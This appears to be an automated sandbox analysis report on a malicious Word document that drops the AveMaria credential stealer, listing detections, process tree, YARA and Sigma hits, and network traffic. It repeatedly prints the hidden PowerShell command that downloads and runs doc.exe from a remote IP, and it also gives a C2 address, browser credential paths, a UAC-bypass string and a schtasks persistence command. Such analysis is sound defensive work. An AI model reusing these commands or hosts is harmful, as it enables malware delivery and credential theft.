Loading ...

Play interactive tourEdit tour

Windows Analysis Report catalogue_2021_samples_list_revise_ol.doc

Overview

General Information

Sample Name:catalogue_2021_samples_list_revise_ol.doc
Analysis ID:492615
MD5:84c45c2b0e94b8d1d064e739150ba84c
SHA1:f6a98ac4e50a89495626b5eaebb85d1116554faa
SHA256:7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32
Tags:AveMariaRATdoc
Infos:

Most interesting Screenshot:

Detection

AveMaria UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and execute file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Increases the number of concurrent connection per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Contains functionality to steal e-mail passwords
Contains functionality to steal Chrome passwords or cookies
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Found suspicious RTF objects
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to enumerate running services
Sigma detected: Verclsid.exe Runs COM Object
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Sigma detected: Windows PowerShell Web Request
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2608 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1868 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 2968 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • doc.exe (PID: 2832 cmdline: 'C:\Users\user\AppData\Roaming\doc.exe' MD5: D8BC91E846E3D624814D4557681F33AD)
        • schtasks.exe (PID: 1992 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • doc.exe (PID: 1280 cmdline: C:\Users\user\AppData\Roaming\doc.exe MD5: D8BC91E846E3D624814D4557681F33AD)
        • doc.exe (PID: 1188 cmdline: C:\Users\user\AppData\Roaming\doc.exe MD5: D8BC91E846E3D624814D4557681F33AD)
        • doc.exe (PID: 1480 cmdline: C:\Users\user\AppData\Roaming\doc.exe MD5: D8BC91E846E3D624814D4557681F33AD)
    • powershell.exe (PID: 1308 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • verclsid.exe (PID: 1016 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2844 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT' MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "152.67.253.163", "port": 5300}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.426889851.00000000001E0000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x325b:$sb1: -W Hidden
  • 0x324b:$sc1: -NoP
  • 0x3255:$sd1: -NonI
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x3250:$sf1: -sta
0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
      • 0x400:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      • 0x400:$c1: Elevation:Administrator!new:
      0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
        Click to see the 27 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.doc.exe.23ecb30.4.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        9.2.doc.exe.23ecb30.4.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xd80:$c1: Elevation:Administrator!new:
        9.2.doc.exe.23ecb30.4.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
          14.2.doc.exe.400000.1.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x150e8:$a1: \Opera Software\Opera Stable\Login Data
          • 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
          14.2.doc.exe.400000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 24 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868
            Sigma detected: PowerShell DownloadFileShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868
            Sigma detected: Verclsid.exe Runs COM ObjectShow sources
            Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1016
            Sigma detected: Windows PowerShell Web RequestShow sources
            Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868
            Sigma detected: PowerShell Download from URLShow sources
            Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

            Data Obfuscation:

            barindex
            Sigma detected: Powershell download and execute fileShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://13.92.100.208/doc/doc.exeAvira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: 9.2.doc.exe.23ee3a0.5.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "152.67.253.163", "port": 5300}
            Multi AV Scanner detection for submitted fileShow sources
            Source: catalogue_2021_samples_list_revise_ol.docVirustotal: Detection: 44%Perma Link
            Source: catalogue_2021_samples_list_revise_ol.docReversingLabs: Detection: 31%
            Yara detected AveMaria stealerShow sources
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeReversingLabs: Detection: 31%
            Source: C:\Users\user\AppData\Roaming\doc.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\AppData\Roaming\maBdogbw.exeReversingLabs: Detection: 31%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\doc.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\maBdogbw.exeJoe Sandbox ML: detected
            Source: 14.2.doc.exe.400000.1.unpackAvira: Label: TR/Redcap.ghjpt
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040CAFC CryptUnprotectData,LocalAlloc,LocalFree,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040CF58 LocalAlloc,BCryptDecrypt,LocalFree,

            Exploits:

            barindex
            Yara detected UACMe UAC Bypass toolShow sources
            Source: Yara matchFile source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: C:\Users\user\AppData\Roaming\doc.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: scorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040FF27 FindFirstFileW,FindNextFileW,

            Software Vulnerabilities:

            barindex
            Document exploit detected (drops PE files)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: doc[1].exe.0.drJump to dropped file
            Document exploit detected (creates forbidden files)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScTJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJump to behavior
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.92.100.208:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.92.100.208:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1560 WEB-MISC /doc/ access 192.168.2.22:49167 -> 13.92.100.208:80
            Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 13.92.100.208:80
            Source: TrafficSnort IDS: 1560 WEB-MISC /doc/ access 192.168.2.22:49168 -> 13.92.100.208:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: 152.67.253.163
            Source: global trafficHTTP traffic detected: GET /doc/doc.exe HTTP/1.1Host: 13.92.100.208Connection: Keep-Alive
